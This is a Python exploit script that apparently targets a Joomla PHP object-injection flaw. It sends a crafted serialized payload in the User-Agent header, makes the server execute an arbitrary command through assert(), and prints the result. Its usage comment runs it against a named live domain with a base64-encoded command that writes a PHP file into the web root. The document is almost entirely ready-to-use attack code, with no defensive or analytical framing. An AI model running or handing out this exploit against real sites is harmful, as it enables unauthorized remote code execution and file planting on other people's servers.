import requests
import re
import sys

url = sys.argv[1]
command = sys.argv[2]

"""
python exp.py http://www.schafx.de/ fputs\(fopen\(base64_decode\(L3Zhci93d3cvaHRtbC9hLnBocA\),w\),base64_decode\(PD9waHAgcGhwaW5mbygpID8\)\)

"""


def attack(uid):
    headers = {
        "User-Agent": '''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%s:"%s;JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86''' % (len(command) + 28, command)
    }
    s = requests.session()
    response = s.get(url='%s' % url, headers=headers)
    response = s.get(url='%s' % url)
    # response = s.post(url='%s' % url,data='a=')
    info = response.content
    return info

info = attack(url)
result = re.findall(r'</html>(.*)', info, re.S | re.I)
print result[0]
# print info
